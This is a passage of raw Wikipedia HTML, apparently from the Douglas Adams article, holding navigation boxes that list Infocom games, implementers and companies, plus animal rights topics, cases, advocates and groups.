Hearts\">Plundered Hearts</a></i></li>\n<li><i><a href=\"/wiki/Seastalker\" title=\"Seastalker\">Seastalker</a></i></li>\n<li><i><a href=\"/wiki/Sherlock:_The_Riddle_of_the_Crown_Jewels\" title=\"Sherlock: The Riddle of the Crown Jewels\">Sherlock: The Riddle of the Crown Jewels</a></i></li>\n<li><i><a href=\"/wiki/James_Clavell%27s_Sh%C5%8Dgun\" title=\"James Clavell's Shōgun\">James Clavell's Shōgun</a></i></li>\n<li><i><a href=\"/wiki/Sorcerer_(video_game)\" title=\"Sorcerer (video game)\">Sorcerer</a></i></li>\n<li><i><a href=\"/wiki/Spellbreaker\" title=\"Spellbreaker\">Spellbreaker</a></i></li>\n<li><i><a href=\"/wiki/Starcross_(video_game)\" title=\"Starcross (video game)\">Starcross</a></i></li>\n<li><i><a href=\"/wiki/Stationfall\" title=\"Stationfall\">Stationfall</a></i></li>\n<li><i><a href=\"/wiki/Suspect_(video_game)\" title=\"Suspect (video game)\">Suspect</a></i></li>\n<li><i><a href=\"/wiki/Suspended\" title=\"Suspended\">Suspended</a></i></li>\n<li><i><a href=\"/wiki/Trinity_(video_game)\" title=\"Trinity (video game)\">Trinity</a></i></li>\n<li><i><a href=\"/wiki/Wishbringer\" title=\"Wishbringer\">Wishbringer</a></i></li>\n<li><i><a href=\"/wiki/The_Witness_(1983_video_game)\" title=\"The Witness (1983 video game)\">The Witness</a></i></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">Other titles</th>\n<td class=\"navbox-list navbox-odd hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><i><a href=\"/wiki/BattleTech:_The_Crescent_Hawk%27s_Inception\" title=\"BattleTech: The Crescent Hawk's Inception\">BattleTech: The Crescent Hawk's Inception</a></i></li>\n<li><i><a href=\"/wiki/BattleTech:_The_Crescent_Hawk%27s_Revenge\" title=\"BattleTech: The Crescent Hawk's Revenge\">BattleTech: The Crescent Hawk's Revenge</a></i></li>\n<li><i><a href=\"/wiki/Circuit%27s_Edge\" title=\"Circuit's Edge\">Circuit's Edge</a></i></li>\n<li><i><a href=\"/wiki/Cornerstone_(software)\" title=\"Cornerstone (software)\">Cornerstone</a></i></li>\n<li><i><a href=\"/wiki/Fooblitzky\" title=\"Fooblitzky\">Fooblitzky</a></i></li>\n<li><i><a href=\"/wiki/Leather_Goddesses_of_Phobos_2:_Gas_Pump_Girls_Meet_the_Pulsating_Inconvenience_from_Planet_X!\" title=\"Leather Goddesses of Phobos 2: Gas Pump Girls Meet the Pulsating Inconvenience from Planet X!\">Leather Goddesses of Phobos 2</a></i></li>\n<li><i><a href=\"/wiki/Mines_of_Titan\" title=\"Mines of Titan\">Mines of Titan</a></i></li>\n<li><i><a href=\"/wiki/Quarterstaff:_The_Tomb_of_Setmoth\" title=\"Quarterstaff: The Tomb of Setmoth\">Quarterstaff: The Tomb of Setmoth</a></i></li>\n<li><i><a href=\"/wiki/Tombs_%26_Treasure\" title=\"Tombs & Treasure\">Tombs & Treasure</a></i></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\"><a href=\"/wiki/Implementer_(video_games)\" title=\"Implementer (video games)\">Implementers</a></th>\n<td class=\"navbox-list navbox-even hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a href=\"/wiki/Tim_Anderson_(Zork)\" title=\"Tim Anderson (Zork)\">Tim Anderson</a></li>\n<li><a href=\"/wiki/Bob_Bates\" title=\"Bob Bates\">Bob Bates</a></li>\n<li><a href=\"/wiki/Michael_Berlyn\" title=\"Michael Berlyn\">Michael Berlyn</a></li>\n<li><a href=\"/wiki/Marc_Blank\" title=\"Marc Blank\">Marc Blank</a></li>\n<li><a href=\"/wiki/Amy_Briggs\" title=\"Amy Briggs\">Amy Briggs</a></li>\n<li>Stu Galley</li>\n<li><a href=\"/wiki/Dave_Lebling\" title=\"Dave Lebling\">Dave Lebling</a></li>\n<li><a href=\"/wiki/Steve_Meretzky\" title=\"Steve Meretzky\">Steve Meretzky</a></li>\n<li><a href=\"/wiki/Brian_Moriarty\" title=\"Brian Moriarty\">Brian Moriarty</a></li>\n<li>Jeff O'Neill</li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">Other people</th>\n<td class=\"navbox-list navbox-odd hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><strong class=\"selflink\">Douglas Adams</strong></li>\n<li><a href=\"/wiki/Bruce_Daniels\" title=\"Bruce Daniels\">Bruce Daniels</a></li>\n<li><a href=\"/wiki/Albert_Vezza\" title=\"Albert Vezza\">Albert Vezza</a></li>\n<li><a href=\"/wiki/Joe_Ybarra\" title=\"Joe Ybarra\">Joe Ybarra</a></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">Companies</th>\n<td class=\"navbox-list navbox-even hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a href=\"/wiki/Infocom\" title=\"Infocom\">Infocom</a></li>\n<li><a href=\"/wiki/Activision\" title=\"Activision\">Activision</a></li>\n<li><a href=\"/wiki/Legend_Entertainment\" title=\"Legend Entertainment\">Legend Entertainment</a></li>\n<li><a href=\"/wiki/Westwood_Studios\" title=\"Westwood Studios\">Westwood Studios</a></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">Miscellaneous</th>\n<td class=\"navbox-list navbox-odd hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a href=\"/wiki/69105_(number)\" title=\"69105 (number)\">69,105</a></li>\n<li><i><a href=\"/wiki/Classic_Text_Adventure_Masterpieces_of_Infocom\" title=\"Classic Text Adventure Masterpieces of Infocom\">Classic Text Adventure Masterpieces of Infocom</a></i></li>\n<li><a href=\"/wiki/Feelie\" class=\"mw-redirect\" title=\"Feelie\">Feelie</a></li>\n<li><i><a href=\"/wiki/Get_Lamp\" title=\"Get Lamp\">Get Lamp</a></i></li>\n<li><a href=\"/wiki/Grue_(monster)\" title=\"Grue (monster)\">Grue</a></li>\n<li><a href=\"/wiki/Hello,_sailor\" title=\"Hello, sailor\">Hello, sailor</a></li>\n<li><a href=\"/wiki/InfoTaskForce\" title=\"InfoTaskForce\">InfoTaskForce</a></li>\n<li><a href=\"/wiki/InvisiClues\" title=\"InvisiClues\">InvisiClues</a></li>\n<li><i><a href=\"/wiki/The_Lost_Treasures_of_Infocom\" title=\"The Lost Treasures of Infocom\">The Lost Treasures of Infocom</a></i></li>\n<li><a href=\"/wiki/Z-machine\" title=\"Z-machine\">Z-machine</a></li>\n<li><a href=\"/wiki/Zork_books\" title=\"Zork books\">Zork books</a></li>\n</ul>\n</div>\n</td>\n</tr>\n</table>\n</div>\n<div role=\"navigation\" class=\"navbox\" aria-labelledby=\"Animal_rights\" style=\"padding:3px\">\n<table class=\"nowraplinks collapsible collapsed navbox-inner\" style=\"border-spacing:0;background:transparent;color:inherit\">\n<tr>\n<th scope=\"col\" class=\"navbox-title\" colspan=\"2\" style=\"text-align: center;\">\n<div class=\"plainlinks hlist navbar mini\">\n<ul>\n<li class=\"nv-view\"><a href=\"/wiki/Template:Animal_rights\" title=\"Template:Animal rights\"><abbr title=\"View this template\" style=\"text-align: center;;;background:none transparent;border:none;\">v</abbr></a></li>\n<li class=\"nv-talk\"><a href=\"/wiki/Template_talk:Animal_rights\" title=\"Template talk:Animal rights\"><abbr title=\"Discuss this template\" style=\"text-align: center;;;background:none transparent;border:none;\">t</abbr></a></li>\n<li class=\"nv-edit\"><a class=\"external text\" href=\"//en.wikipedia.org/w/index.php?title=Template:Animal_rights&action=edit\"><abbr title=\"Edit this template\" style=\"text-align: center;;;background:none transparent;border:none;\">e</abbr></a></li>\n</ul>\n</div>\n<div id=\"Animal_rights\" style=\"font-size:114%\"><a href=\"/wiki/Animal_rights\" title=\"Animal rights\">Animal rights</a></div>\n</th>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\" style=\"text-align: center;\">Topics</th>\n<td class=\"navbox-list navbox-off hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\"></div>\n<table class=\"nowraplinks navbox-subgroup\" style=\"border-spacing:0\">\n<tr>\n<th scope=\"row\" class=\"navbox-group\" style=\"text-align: center;\"><a href=\"/wiki/Category:Animal_rights\" title=\"Category:Animal rights\">Overview</a></th>\n<td class=\"navbox-list navbox-odd\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a href=\"/wiki/Abolitionism_(animal_rights)\" title=\"Abolitionism (animal rights)\">Abolitionism</a></li>\n<li><a href=\"/wiki/Animal_protectionism\" title=\"Animal protectionism\">Animal protectionism</a></li>\n<li><a href=\"/wiki/Animal_welfare\" title=\"Animal welfare\">Animal welfare</a></li>\n<li><a href=\"/wiki/Speciesism\" title=\"Speciesism\">Speciesism</a></li>\n<li><a href=\"/wiki/Veganism\" title=\"Veganism\">Veganism</a></li>\n<li><b><a href=\"/wiki/Category:Animal_rights\" title=\"Category:Animal rights\">more...</a></b></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\" style=\"text-align: center;\"><a href=\"/wiki/Category:Animal_rights\" title=\"Category:Animal rights\">Issues</a></th>\n<td class=\"navbox-list navbox-even\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a href=\"/wiki/Ahimsa\" title=\"Ahimsa\">Ahimsa</a></li>\n<li><a href=\"/wiki/Animal_cognition\" title=\"Animal cognition\">Animal cognition</a></li>\n<li><a href=\"/wiki/Animal_consciousness\" title=\"Animal consciousness\">Animal consciousness</a></li>\n<li><a href=\"/wiki/Animal_law\" title=\"Animal law\">Animal law</a></li>\n<li><a href=\"/wiki/Animal_model\" class=\"mw-redirect\" title=\"Animal model\">Animal model</a></li>\n<li><a href=\"/wiki/Animal_rights_and_the_Holocaust\" title=\"Animal rights and the Holocaust\">Animal rights and the Holocaust</a></li>\n<li><a href=\"/wiki/Animal_product\" title=\"Animal product\">Animal product</a></li>\n<li><a href=\"/wiki/Animal_rights_movement\" title=\"Animal rights movement\">Animal rights movement</a></li>\n<li><a href=\"/wiki/Animal_testing\" title=\"Animal testing\">Animal testing</a></li>\n<li><a href=\"/wiki/Animal_testing_on_non-human_primates\" title=\"Animal testing on non-human primates\">Animal testing on non-human primates</a></li>\n<li><a href=\"/wiki/Animals_in_sport\" title=\"Animals in sport\">Animals in sport</a></li>\n<li><a href=\"/wiki/Anthrozoology\" title=\"Anthrozoology\">Anthrozoology</a></li>\n<li><a href=\"/wiki/Anti-hunting\" class=\"mw-redirect\" title=\"Anti-hunting\">Anti-hunting</a></li>\n<li><a href=\"/wiki/Bile_bear\" title=\"Bile bear\">Bile bear</a></li>\n<li><a href=\"/wiki/Bioethics\" title=\"Bioethics\">Bioethics</a></li>\n<li><a href=\"/wiki/Blood_sport\" title=\"Blood sport\">Blood sport</a></li>\n<li><a href=\"/wiki/Cambridge_Declaration_on_Consciousness\" class=\"mw-redirect\" title=\"Cambridge Declaration on Consciousness\">Cambridge Declaration on Consciousness</a></li>\n<li><a href=\"/wiki/Carnism\" title=\"Carnism\">Carnism</a></li>\n<li><a href=\"/wiki/Testing_cosmetics_on_animals\" title=\"Testing cosmetics on animals\">Cosmetics testing</a></li>\n<li><a href=\"/wiki/Chick_culling\" title=\"Chick culling\">Chick culling</a></li>\n<li><a href=\"/wiki/Christianity_and_animal_rights\" title=\"Christianity and animal rights\">Christianity and animal rights</a></li>\n<li><a href=\"/wiki/Concentrated_Animal_Feeding_Operation\" class=\"mw-redirect\" title=\"Concentrated Animal Feeding Operation\">Concentrated Animal Feeding Operation</a></li>\n<li><a href=\"/wiki/Cormorant_culling\" title=\"Cormorant culling\">Cormorant culling</a></li>\n<li><a href=\"/wiki/Covance\" title=\"Covance\">Covance</a></li>\n<li><a href=\"/wiki/Cruelty_to_animals\" title=\"Cruelty to animals\">Cruelty to animals</a></li>\n<li><a href=\"/wiki/Deep_ecology\" title=\"Deep ecology\">Deep ecology</a></li>\n<li><a href=\"/wiki/Ethics_of_eating_meat\" title=\"Ethics of eating meat\">Ethics of eating meat</a></li>\n<li><a href=\"/wiki/Fox_hunting\" title=\"Fox hunting\">Fox hunting</a></li>\n<li><a href=\"/wiki/Fur_trade\" title=\"Fur trade\">Fur trade</a></li>\n<li><a href=\"/wiki/Great_ape_research_ban\" title=\"Great ape research ban\">Great ape research ban</a></li>\n<li><a href=\"/wiki/Green_Scare\" title=\"Green Scare\">Green Scare</a></li>\n<li><a href=\"/wiki/Huntingdon_Life_Sciences\" title=\"Huntingdon Life Sciences\">Huntingdon Life Sciences</a></li>\n<li><a href=\"/wiki/Intensive_animal_farming\" title=\"Intensive animal farming\">Intensive animal farming</a></li>\n<li><a href=\"/wiki/Ivory_trade\" title=\"Ivory trade\">Ivory trade</a></li>\n<li><a href=\"/wiki/Livestock\" title=\"Livestock\">Livestock</a></li>\n<li><a href=\"/wiki/Meat_paradox\" class=\"mw-redirect\" title=\"Meat paradox\">Meat paradox</a></li>\n<li><a href=\"/wiki/Nafovanny\" title=\"Nafovanny\">Nafovanny</a></li>\n<li><a href=\"/wiki/Nonviolence\" title=\"Nonviolence\">Nonviolence</a></li>\n<li><a href=\"/wiki/Open_rescue\" title=\"Open rescue\">Open rescue</a></li>\n<li><a href=\"/wiki/Operation_Backfire_(FBI)\" title=\"Operation Backfire (FBI)\">Operation Backfire</a></li>\n<li><a href=\"/wiki/Pain_in_animals\" title=\"Pain in animals\">Pain in animals</a></li>\n<li><a href=\"/wiki/Pain_and_suffering_in_laboratory_animals\" class=\"mw-redirect\" title=\"Pain and suffering in laboratory animals\">Pain and suffering in laboratory animals</a></li>\n<li><a href=\"/wiki/International_primate_trade\" title=\"International primate trade\">Primate trade</a></li>\n<li><a href=\"/wiki/Seal_hunting\" title=\"Seal hunting\">Seal hunting</a></li>\n<li><a href=\"/wiki/Slaughterhouse\" title=\"Slaughterhouse\">Slaughterhouse</a></li>\n<li><a href=\"/wiki/Stock-free_agriculture\" class=\"mw-redirect\" title=\"Stock-free agriculture\">Stock-free agriculture</a></li>\n<li><a href=\"/wiki/Toxicology_testing\" title=\"Toxicology testing\">Toxicology testing</a></li>\n<li><a href=\"/wiki/Veganarchism\" title=\"Veganarchism\">Veganarchism</a></li>\n<li><a href=\"/wiki/Veganism\" title=\"Veganism\">Veganism</a></li>\n<li><a href=\"/wiki/Vegetarianism\" title=\"Vegetarianism\">Vegetarianism</a></li>\n<li><a href=\"/wiki/Western_Australian_shark_cull\" title=\"Western Australian shark cull\">Western Australian shark cull</a></li>\n<li><b><a href=\"/wiki/Category:Animal_rights\" title=\"Category:Animal rights\">more...</a></b></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\" style=\"text-align: center;\">Cases</th>\n<td class=\"navbox-list navbox-odd\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px;background:\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a href=\"/wiki/Brown_Dog_affair\" title=\"Brown Dog affair\">Brown Dog affair</a></li>\n<li><a href=\"/wiki/Cambridge_University_primates\" title=\"Cambridge University primates\">Cambridge University primates</a></li>\n<li><a href=\"/wiki/McDonald%27s_Restaurants_v._Morris_%26_Steel\" class=\"mw-redirect\" title=\"McDonald's Restaurants v. Morris & Steel\">McLibel case</a></li>\n<li><a href=\"/wiki/Pit_of_despair\" title=\"Pit of despair\">Pit of despair</a></li>\n<li><a href=\"/wiki/Silver_Spring_monkeys\" title=\"Silver Spring monkeys\">Silver Spring monkeys</a></li>\n<li><a href=\"/wiki/University_of_California_Riverside_1985_laboratory_raid\" class=\"mw-redirect\" title=\"University of California Riverside 1985 laboratory raid\">University of California Riverside 1985 laboratory raid</a></li>\n<li><i><a href=\"/wiki/Unnecessary_Fuss\" title=\"Unnecessary Fuss\">Unnecessary Fuss</a></i></li>\n</ul>\n</div>\n</td>\n</tr>\n</table>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\" style=\"text-align: center;\"><a href=\"/wiki/List_of_animal_rights_advocates\" title=\"List of animal rights advocates\">Advocates</a></th>\n<td class=\"navbox-list navbox-off hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\"></div>\n<table class=\"nowraplinks navbox-subgroup\" style=\"border-spacing:0\">\n<tr>\n<th scope=\"row\" class=\"navbox-group\"><a href=\"/wiki/Category:Animal_rights_advocates\" title=\"Category:Animal rights advocates\">Academics<br />\nand writers</a></th>\n<td class=\"navbox-list navbox-odd\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a href=\"/wiki/Carol_J._Adams\" title=\"Carol J. Adams\">Carol Adams</a></li>\n<li><a href=\"/wiki/Tom_Beauchamp\" title=\"Tom Beauchamp\">Tom Beauchamp</a></li>\n<li><a href=\"/wiki/Marc_Bekoff\" title=\"Marc Bekoff\">Marc Bekoff</a></li>\n<li><a href=\"/wiki/Paola_Cavalieri\" title=\"Paola Cavalieri\">Paola Cavalieri</a></li>\n<li><a href=\"/wiki/Stephen_R._L._Clark\" title=\"Stephen R. L. Clark\">Stephen R. L. Clark</a></li>\n<li><a href=\"/wiki/Alasdair_Cochrane\" title=\"Alasdair Cochrane\">Alasdair Cochrane</a></li>\n<li><a href=\"/wiki/J._M._Coetzee\" title=\"J. M. Coetzee\">J. M. Coetzee</a></li>\n<li><a href=\"/wiki/Priscilla_Cohn\" title=\"Priscilla Cohn\">Priscilla Cohn</a></li>\n<li><a href=\"/wiki/David_DeGrazia\" title=\"David DeGrazia\">David DeGrazia</a></li>\n<li><a href=\"/wiki/Sue_Donaldson\" title=\"Sue Donaldson\">Sue Donaldson</a></li>\n<li><a href=\"/wiki/Josephine_Donovan\" title=\"Josephine Donovan\">Josephine Donovan</a></li>\n<li><a href=\"/wiki/Lawrence_Finsen\" title=\"Lawrence Finsen\">Lawrence Finsen</a></li>\n<li><a href=\"/wiki/Gary_Francione\" class=\"mw-redirect\" title=\"Gary Francione\">Gary Francione</a></li>\n<li><a href=\"/wiki/Robert_Garner\" title=\"Robert Garner\">Robert Garner</a></li>\n<li><a href=\"/wiki/Antoine_Goetschel\" title=\"Antoine Goetschel\">Antoine Goetschel</a></li>\n<li><a href=\"/wiki/John_Hadley_(philosopher)\" title=\"John Hadley (philosopher)\">John Hadley</a></li>\n<li><a href=\"/wiki/Will_Kymlicka\" title=\"Will Kymlicka\">Will Kymlicka</a></li>\n<li><a href=\"/wiki/Andrew_Linzey\" title=\"Andrew Linzey\">Andrew Linzey</a></li>\n<li><a href=\"/wiki/Dan_Lyons\" title=\"Dan Lyons\">Dan Lyons</a></li>\n<li><a href=\"/wiki/Mary_Midgley\" title=\"Mary Midgley\">Mary Midgley</a></li>\n<li><a href=\"/wiki/Martha_Nussbaum\" title=\"Martha Nussbaum\">Martha Nussbaum</a></li>\n<li><a href=\"/wiki/Siobhan_O%27Sullivan\" title=\"Siobhan O'Sullivan\">Siobhan O'Sullivan</a></li>\n<li><a href=\"/wiki/Clare_Palmer\" title=\"Clare Palmer\">Clare Palmer</a></li>\n<li><a href=\"/wiki/Tom_Regan\" title=\"Tom Regan\">Tom Regan</a></li>\n<li><a href=\"/wiki/Bernard_Rollin\" title=\"Bernard Rollin\">Bernard Rollin</a></li>\n<li><a href=\"/wiki/Mark_Rowlands\" title=\"Mark Rowlands\">Mark Rowlands</a></li>\n<li><a href=\"/wiki/Richard_D._Ryder\" title=\"Richard D. Ryder\">Richard D. Ryder</a></li>\n<li><a href=\"/wiki/Peter_Singer\" title=\"Peter Singer\">Peter Singer</a></li>\n<li><a href=\"/wiki/Henry_Stephens_Salt\" title=\"Henry Stephens Salt\">Henry Stephens Salt</a></li>\n<li><a href=\"/wiki/Steve_Sapontzis\" title=\"Steve Sapontzis\">Steve Sapontzis</a></li>\n<li><a href=\"/wiki/Gary_Steiner\" title=\"Gary Steiner\">Gary Steiner</a></li>\n<li><a href=\"/wiki/Cass_Sunstein\" title=\"Cass Sunstein\">Cass Sunstein</a></li>\n<li><b><a href=\"/wiki/List_of_animal_rights_advocates\" title=\"List of animal rights advocates\">more...</a></b></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\"><a href=\"/wiki/Category:Animal_rights_advocates\" title=\"Category:Animal rights advocates\">Activists</a></th>\n<td class=\"navbox-list navbox-even\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a href=\"/wiki/Cleveland_Amory\" title=\"Cleveland Amory\">Cleveland Amory</a></li>\n<li><a href=\"/wiki/Pamela_Anderson\" title=\"Pamela Anderson\">Pamela Anderson</a></li>\n<li><a href=\"/wiki/Greg_Avery\" title=\"Greg Avery\">Greg Avery</a></li>\n<li><a href=\"/wiki/Alec_Baldwin\" title=\"Alec Baldwin\">Alec Baldwin</a></li>\n<li><a href=\"/wiki/Matt_Ball\" title=\"Matt Ball\">Matt Ball</a></li>\n<li><a href=\"/wiki/Martin_Balluch\" title=\"Martin Balluch\">Martin Balluch</a></li>\n<li><a href=\"/wiki/Barbi_twins\" class=\"mw-redirect\" title=\"Barbi twins\">Barbi twins</a></li>\n<li><a href=\"/wiki/Brigitte_Bardot\" title=\"Brigitte Bardot\">Brigitte Bardot</a></li>\n<li><a href=\"/wiki/Bob_Barker\" title=\"Bob Barker\">Bob Barker</a></li>\n<li><a href=\"/wiki/Gene_Baur\" title=\"Gene Baur\">Gene Baur</a></li>\n<li><a href=\"/wiki/Frances_Power_Cobbe\" title=\"Frances Power Cobbe\">Frances Power Cobbe</a></li>\n<li><a href=\"/wiki/Rod_Coronado\" title=\"Rod Coronado\">Rod Coronado</a></li>\n<li><a href=\"/wiki/Evandro_Costa\" title=\"Evandro Costa\">Evandro Costa</a></li>\n<li><a href=\"/wiki/Karen_Davis_(activist)\" title=\"Karen Davis (activist)\">Karen Davis</a></li>\n<li><a href=\"/wiki/Chris_DeRose\" title=\"Chris DeRose\">Chris DeRose</a></li>\n<li><a href=\"/wiki/Robert_Enke\" title=\"Robert Enke\">Robert Enke</a></li>\n<li><a href=\"/wiki/John_Feldmann\" title=\"John Feldmann\">John Feldmann</a></li>\n<li><a href=\"/wiki/Bruce_Friedrich\" title=\"Bruce Friedrich\">Bruce Friedrich</a></li>\n<li><a href=\"/wiki/Juliet_Gellatley\" title=\"Juliet Gellatley\">Juliet Gellatley</a></li>\n<li><a href=\"/wiki/Jordan_Halliday\" title=\"Jordan Halliday\">Jordan Halliday</a></li>\n<li><a href=\"/wiki/Barry_Horne\" title=\"Barry Horne\">Barry Horne</a></li>\n<li><a href=\"/wiki/Ronnie_Lee\" title=\"Ronnie Lee\">Ronnie Lee</a></li>\n<li><a href=\"/wiki/Lizzy_Lind_af_Hageby\" title=\"Lizzy Lind af Hageby\">Lizzy Lind af Hageby</a></li>\n<li><a href=\"/wiki/Jo-Anne_McArthur\" title=\"Jo-Anne McArthur\">Jo-Anne McArthur</a></li>\n<li><a href=\"/wiki/Paul_McCartney\" title=\"Paul McCartney\">Paul McCartney</a></li>\n<li><a href=\"/wiki/Bill_Maher\" title=\"Bill Maher\">Bill Maher</a></li>\n<li><a href=\"/wiki/Keith_Mann\" title=\"Keith Mann\">Keith Mann</a></li>\n<li><a href=\"/wiki/Dan_Mathews\" title=\"Dan Mathews\">Dan Mathews</a></li>\n<li><a href=\"/wiki/Ingrid_Newkirk\" title=\"Ingrid Newkirk\">Ingrid Newkirk</a></li>\n<li><a href=\"/wiki/Heather_Nicholson\" title=\"Heather Nicholson\">Heather Nicholson</a></li>\n<li><a href=\"/wiki/Alex_Pacheco_(activist)\" title=\"Alex Pacheco (activist)\">Alex Pacheco</a></li>\n<li><a href=\"/wiki/Jill_Phipps\" title=\"Jill Phipps\">Jill Phipps</a></li>\n<li><a href=\"/wiki/Joaquin_Phoenix\" title=\"Joaquin Phoenix\">Joaquin Phoenix</a></li>\n<li><a href=\"/wiki/Craig_Rosebraugh\" title=\"Craig Rosebraugh\">Craig Rosebraugh</a></li>\n<li><a href=\"/wiki/Nathan_Runkle\" title=\"Nathan Runkle\">Nathan Runkle</a></li>\n<li><a href=\"/wiki/Henry_Spira\" title=\"Henry Spira\">Henry Spira</a></li>\n<li><a href=\"/wiki/Kim_Stallwood\" title=\"Kim Stallwood\">Kim Stallwood</a></li>\n<li><a href=\"/wiki/Marianne_Thieme\" title=\"Marianne Thieme\">Marianne Thieme</a></li>\n<li><a href=\"/wiki/Darren_Thurston\" title=\"Darren Thurston\">Darren Thurston</a></li>\n<li><a href=\"/wiki/Andrew_Tyler\" title=\"Andrew Tyler\">Andrew Tyler</a></li>\n<li><a href=\"/wiki/Gary_Yourofsky\" title=\"Gary Yourofsky\">Gary Yourofsky</a></li>\n<li><b><a href=\"/wiki/List_of_animal_rights_advocates\" title=\"List of animal rights advocates\">more...</a></b></li>\n</ul>\n</div>\n</td>\n</tr>\n</table>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\" style=\"text-align: center;\">Movement</th>\n<td class=\"navbox-list navbox-off hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\"></div>\n<table class=\"nowraplinks navbox-subgroup\" style=\"border-spacing:0\">\n<tr>\n<th scope=\"row\" class=\"navbox-group\"><a href=\"/wiki/Category:Animal_rights_movement\" title=\"Category:Animal rights movement\">Groups</a></th>\n<td class=\"navbox-list navbox-odd\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a href=\"/wiki/Animal_Aid\" title=\"Animal Aid\">Animal Aid</a></li>\n<li><a href=\"/wiki/Animal_Legal_Defense_Fund\" title=\"Animal Legal Defense Fund\">Animal Legal Defense Fund</a></li>\n<li><a href=\"/wiki/Animal_Liberation_Front\" title=\"Animal Liberation Front\">Animal Liberation Front</a></li>\n<li><a href=\"/wiki/British_Union_for_the_Abolition_of_Vivisection\" class=\"mw-redirect\" title=\"British Union for the Abolition of Vivisection\">British Union for the Abolition of Vivisection</a></li>\n<li><a href=\"/wiki/Centre_for_Animals_and_Social_Justice\" title=\"Centre for Animals and Social Justice\">Centre for Animals and Social Justice</a></li>\n<li><a href=\"/wiki/Chinese_Animal_Protection_Network\" title=\"Chinese Animal Protection Network\">Chinese Animal Protection Network</a></li>\n<li><a href=\"/wiki/Direct_Action_Everywhere\" title=\"Direct Action Everywhere\">Direct Action Everywhere</a></li>\n<li><a href=\"/wiki/Farm_Animal_Rights_Movement\" title=\"Farm Animal Rights Movement\">Farm Animal Rights Movement</a></li>\n<li><a href=\"/wiki/Great_Ape_Project\" title=\"Great Ape Project\">Great Ape Project</a></li>\n<li><a href=\"/wiki/Hunt_Saboteurs_Association\" title=\"Hunt Saboteurs Association\">Hunt Saboteurs Association</a></li>\n<li><a href=\"/wiki/In_Defense_of_Animals\" title=\"In Defense of Animals\">In Defense of Animals</a></li>\n<li><a href=\"/wiki/Korea_Animal_Rights_Advocates\" title=\"Korea Animal Rights Advocates\">Korea Animal Rights Advocates</a></li>\n<li><a href=\"/wiki/Last_Chance_for_Animals\" title=\"Last Chance for Animals\">Last Chance for Animals</a></li>\n<li><a href=\"/wiki/Mercy_for_Animals\" title=\"Mercy for Animals\">Mercy for Animals</a></li>\n<li><a href=\"/wiki/New_England_Anti-Vivisection_Society\" title=\"New England Anti-Vivisection Society\">New England Anti-Vivisection Society</a></li>\n<li><a href=\"/wiki/Oxford_Centre_for_Animal_Ethics\" title=\"Oxford Centre for Animal Ethics\">Oxford Centre for Animal Ethics</a></li>\n<li><a href=\"/wiki/Oxford_Group_(animal_rights)\" title=\"Oxford Group (animal rights)\">Oxford Group</a></li>\n<li><a href=\"/wiki/People_for_the_Ethical_Treatment_of_Animals\" title=\"People for the Ethical Treatment of Animals\">People for the Ethical Treatment of Animals</a></li>\n<li><a 